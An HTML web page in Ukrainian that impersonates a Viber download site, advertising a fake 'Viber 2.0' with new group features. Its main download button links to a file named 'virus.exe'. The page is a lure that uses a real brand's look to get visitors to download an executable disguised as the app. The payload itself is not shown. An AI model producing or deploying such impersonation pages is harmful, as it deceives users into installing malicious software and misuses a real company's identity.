<!DOCTYPE HTML>

<html lang="ua">

<head>
  <title>Viber 2.0</title>
  <meta charset="utf-8">
  <link rel="icon" href="icon.png">
  <style>
  html, body {
          margin: 0;
          padding: 0;
          color: #1d1d1d;
  }

  .head {
          background: #fcfcfc;
          color: #7444CC;
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 35px;
          padding: 10px;
          border-bottom: 1px solid #f0f0f0;
  }

  p {
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 23px;
          max-width: 550px;
          margin: 100px;
          position: relative;
          color: #fff
  }

  .a {
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 30px;
          background: #13BD00;
          border-radius: 100px;
          padding: 15px;
          text-decoration: none;
          position: relative;
          top: -900px;
          color: #fff;
          right: 500px;
  }

    a {
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 30px;
          padding: 20px;
          color: #7444CC;
          position: relative;
   }

  a:focus {
        color: #C6BCE7;
  }

  .figna {
          right: -650px;
          color: #8d8d8d;
          font-size: 17px;
  }

  .video {
          position: relative;
          padding-bottom: 56.25%;
  }

  .video_media {
          width: 100%;
          position: absolute;
          top: 0;
          left: 0;
          height: auto;
  }

  </style>
</head>

<body>
         <div class="head"><span style="position: relative; right: -20px;">Viber</span> <a class="figna" href="#">Blog</a> <a class="figna" href="#">Communities</a> <a class="figna" href="#">About</a> <a class="figna" href="#">Security</a></div>
         <div class="video">
         <video class="video_media" src="video.mp4" autoplay muted loop></video>
         </div>
         <center>
         <p style="position: relative; top: -900px; right: 500px;">Завантажте додаток Viber 2.0 і поспілкуйтеся з друзями та рідними за допомогою відеозв'язку
         або просто надішліть їм повідомлення, з новим Viber тепер ви зможете робити ролі та полнітсю налаштовувати свої групи,
         а також тепер можна ставити на аватарку й фото групи гіф зображення і останнє що ми зробили відновили дизайн і виправили баги :)</p>
         <a class="a" style="text-decoration: none;" download href="virus.exe">Завантажити Viber 2.0</a>
         <p style="color: #1d1d1d; position: relative; top: -500px;">Якщо ви все же знайшли проблему в Viber 2.0, то відправьте повідомлення про проблему нам</p>
         </center>
</body>

</html>